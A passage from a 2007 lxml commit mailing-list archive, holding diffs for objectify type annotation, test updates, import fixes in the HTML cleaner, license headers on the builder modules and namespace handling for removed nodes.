_annotate(_Element element, int annotate_xsi, int annotate_pytype, + int ignore_xsi, int ignore_pytype, + empty_type_name, empty_pytype_name): cdef _Document doc - cdef int ignore cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result - cdef PyType pytype - element = cetree.rootNodeOrRaise(element_or_tree) + cdef PyType pytype, empty_pytype, StrType, NoneType + + if not annotate_xsi and not annotate_pytype: + return + doc = element._doc - ignore = bool(ignore_old) + + if empty_type_name is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, empty_type_name) + elif empty_pytype_name is not None: + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, empty_pytype_name) + else: + dict_result = NULL + if dict_result is not NULL: + empty_pytype = dict_result + else: + empty_pytype = None StrType = _PYTYPE_DICT.get('str') NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) if c_node.type == tree.XML_ELEMENT_NODE: + typename = None pytype = None value = None - if not ignore: - # check that old value is valid + istree = 0 + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None and not ignore_xsi: + # check that old xsi type value is valid + typename = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if typename is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is NULL and ':' in typename: + prefix, typename = typename.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) + if pytype is None: + typename = None + + if pytype is None and not ignore_pytype: + # check that old pytype value is valid old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: @@ -1508,43 +1586,73 @@ pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is NULL and ':' in value: - prefix, value = value.split(':', 1) - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class pytype = _guessPyType(textOf(c_node), StrType) + else: + istree = 1 if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNsPrefix( - doc, c_node, _PYTYPE_NAMESPACE, 'py') - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + # use default type for empty elements + if textOf(c_node) is None: + pytype = empty_pytype + if typename is None: + typename = empty_type_name + else: + pytype = StrType + + if pytype is not None: + if typename is None: + if not istree: + if python.PyList_GET_SIZE(pytype._schema_types) > 0: + # pytype->xsi:type is a 1:n mapping + # simply take the first + typename = pytype._schema_types[0] + elif typename not in pytype._schema_types: + typename = pytype._schema_types[0] + + if annotate_xsi: + if typename is None or istree: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_NS, 'xsd') + if c_ns is not NULL: + if ':' in typename: + prefix, name = typename.split(':', 1) + if c_ns.prefix is NULL or c_ns.prefix[0] == c'\0': + typename = name + elif cstd.strcmp(_cstr(prefix), c_ns.prefix) != 0: + prefix = c_ns.prefix + typename = prefix + ':' + name + elif c_ns.prefix is not NULL or c_ns.prefix[0] != c'\0': + prefix = c_ns.prefix + typename = prefix + ':' + typename + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "type", _cstr(typename)) + + if annotate_pytype: + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _PYTYPE_NAMESPACE, 'py') + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) + if pytype is NoneType: + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "nil", "true") tree.END_FOR_EACH_ELEMENT_FROM(c_node) -def xsiannotate(element_or_tree, ignore_old=True): +def __xsiannotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'xsi:type' attributes. Modified: lxml/trunk/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_objectify.py (original) +++ lxml/trunk/src/lxml/tests/test_objectify.py Fri Jun 22 09:40:07 2007 @@ -555,6 +555,26 @@ self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + def test_pytype_annotation_empty(self): + XML = self.XML + root = XML(u'''\ + + + + ''') + objectify.annotate(root) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals(None, child_types[0]) + + objectify.annotate(root, empty_pytype="str") + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("str", child_types[0]) + def test_pytype_annotation_use_old(self): XML = self.XML root = XML(u'''\ From scoder at codespeak.net Fri Jun 22 09:42:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 09:42:33 +0200 (CEST) Subject: [Lxml-checkins] r44414 - in lxml/trunk/src/lxml: . tests Message-ID: <20070622074233.8755680CB@code0.codespeak.net> Author: scoder Date: Fri Jun 22 09:42:33 2007 New Revision: 44414 Modified: lxml/trunk/src/lxml/objectify.pyx lxml/trunk/src/lxml/tests/test_objectify.py Log: swapped xsi annotations for double and float types: prefer double Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 22 09:42:33 2007 @@ -903,7 +903,7 @@ pytype.register() pytype = PyType('float', float, FloatElement) - pytype.xmlSchemaTypes = ("float", "double") + pytype.xmlSchemaTypes = ("double", "float") pytype.register() pytype = PyType('bool', __checkBool, BoolElement) Modified: lxml/trunk/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_objectify.py (original) +++ lxml/trunk/src/lxml/tests/test_objectify.py Fri Jun 22 09:42:33 2007 @@ -599,19 +599,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -639,18 +639,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:int", child_types[7]) - self.assertEquals("xsd:int", child_types[8]) - self.assertEquals("xsd:int", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:int", child_types[ 7]) + self.assertEquals("xsd:int", child_types[ 8]) + self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -679,18 +679,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:double", child_types[7]) - self.assertEquals("xsd:float", child_types[8]) - self.assertEquals("xsd:string", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -750,7 +750,7 @@ for c in root.iterchildren() ] self.assertEquals("xsd:int", child_types[ 0]) self.assertEquals("xsd:string", child_types[ 1]) - self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:double", child_types[ 2]) self.assertEquals("xsd:string", child_types[ 3]) self.assertEquals("xsd:boolean", child_types[ 4]) self.assertEquals(None, child_types[ 5]) @@ -759,7 +759,7 @@ self.assertEquals("xsd:int", child_types[ 8]) self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) From scoder at codespeak.net Fri Jun 22 10:13:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 10:13:16 +0200 (CEST) Subject: [Lxml-checkins] r44415 - lxml/branch/html/src/lxml/html Message-ID: <20070622081316.EA7D180CB@code0.codespeak.net> Author: scoder Date: Fri Jun 22 10:13:16 2007 New Revision: 44415 Modified: lxml/branch/html/src/lxml/html/clean.py Log: import fix Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 22 10:13:16 2007 @@ -4,7 +4,7 @@ from lxml.html import parse, tostring try: - import set + set except ImportError: from sets import Set as set From scoder at codespeak.net Fri Jun 22 11:55:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 11:55:41 +0200 (CEST) Subject: [Lxml-checkins] r44422 - lxml/branch/html/src/lxml/html Message-ID: <20070622095541.1A50080F0@code0.codespeak.net> Author: scoder Date: Fri Jun 22 11:55:40 2007 New Revision: 44422 Modified: lxml/branch/html/src/lxml/html/clean.py Log: import fix Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 22 11:55:40 2007 @@ -5,7 +5,7 @@ try: set -except ImportError: +except NameError: from sets import Set as set __all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', From scoder at codespeak.net Fri Jun 22 14:13:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:13:43 +0200 (CEST) Subject: [Lxml-checkins] r44427 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622121343.0954B80F1@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:13:42 2007 New Revision: 44427 Added: lxml/branch/lxml-1.3/src/lxml/builder.py - copied unchanged from r44426, lxml/trunk/src/lxml/builder.py Log: re-integrated FL's E-Factory into lxml 1.3 From scoder at codespeak.net Fri Jun 22 14:13:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:13:51 +0200 (CEST) Subject: [Lxml-checkins] r44428 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622121351.5A6D280F6@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:13:50 2007 New Revision: 44428 Added: lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py - copied unchanged from r44427, lxml/trunk/src/lxml/htmlbuilder.py Log: re-integrated FL's E-Factory into lxml 1.3 From scoder at codespeak.net Fri Jun 22 14:39:59 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:39:59 +0200 (CEST) Subject: [Lxml-checkins] r44429 - lxml/trunk/src/lxml Message-ID: <20070622123959.5C0D680E9@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:39:57 2007 New Revision: 44429 Modified: lxml/trunk/src/lxml/builder.py lxml/trunk/src/lxml/htmlbuilder.py Log: builder license Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Fri Jun 22 14:39:57 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. +# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. +# -------------------------------------------------------------------- import etree as ET Modified: lxml/trunk/src/lxml/htmlbuilder.py ============================================================================== --- lxml/trunk/src/lxml/htmlbuilder.py (original) +++ lxml/trunk/src/lxml/htmlbuilder.py Fri Jun 22 14:39:57 2007 @@ -1,6 +1,35 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. +# -------------------------------------------------------------------- +""" Usage:: >>> from lxml.htmlbuilder import * From scoder at codespeak.net Fri Jun 22 14:40:14 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:40:14 +0200 (CEST) Subject: [Lxml-checkins] r44430 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622124014.EFF8C80EF@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:40:14 2007 New Revision: 44430 Modified: lxml/branch/lxml-1.3/src/lxml/builder.py lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Log: builder license Modified: lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/builder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/builder.py Fri Jun 22 14:40:14 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. +# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. +# -------------------------------------------------------------------- import etree as ET Modified: lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Fri Jun 22 14:40:14 2007 @@ -1,6 +1,35 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. +# -------------------------------------------------------------------- +""" Usage:: >>> from lxml.htmlbuilder import * From scoder at codespeak.net Fri Jun 22 19:10:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:10:40 +0200 (CEST) Subject: [Lxml-checkins] r44433 - lxml/trunk/src/lxml/tests Message-ID: <20070622171040.AA88E8120@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:10:38 2007 New Revision: 44433 Modified: lxml/trunk/src/lxml/tests/test_etree.py Log: fix after XInclude directory change Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Fri Jun 22 19:10:38 2007 @@ -1398,12 +1398,33 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) self.assertEquals( [1, 2, 3], [ el.sourceline for el in tree.getiterator() ]) + def test_sourceline_iterparse_end(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'))) + + self.assertEquals( + [2, 3, 1], + lines) + + def test_sourceline_iterparse_start(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'), + events=("start",))) + + self.assertEquals( + [1, 2, 3], + lines) + def test_sourceline_element(self): Element = self.etree.Element SubElement = self.etree.SubElement From scoder at codespeak.net Fri Jun 22 19:33:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:33:41 +0200 (CEST) Subject: [Lxml-checkins] r44434 - in lxml/trunk: . src/lxml src/lxml/tests Message-ID: <20070622173341.D06CF8125@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:33:41 2007 New Revision: 44434 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/proxy.pxi lxml/trunk/src/lxml/tests/test_elementtree.py Log: make removed nodes ns-self-contained Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 22 19:33:41 2007 @@ -52,6 +52,9 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them loose their namespace + declarations + * ``ElementInclude`` didn't honour base URL of original document * Replacing the children slice of an Element would cut off the tails of the Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Fri Jun 22 19:33:41 2007 @@ -487,14 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. """ cdef xmlNode* c_next c_next = c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -522,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -536,7 +540,7 @@ if _isElement(c_node): while c_next is not NULL and not _isElement(c_next): c_next = c_next.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -555,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -571,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -587,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 22 19:33:41 2007 @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +488,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if c_node is not NULL and start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -505,7 +506,7 @@ # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -599,7 +600,7 @@ if _isElement(c_node): while c_node_next is not NULL and not _isElement(c_node_next): c_node_next = c_node_next.next - _removeNode(c_node) + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +615,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. Unlike the find methods, this @@ -629,6 +630,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,7 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) # PROPERTIES property tag: Modified: lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Fri Jun 22 19:33:41 2007 @@ -116,19 +116,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node 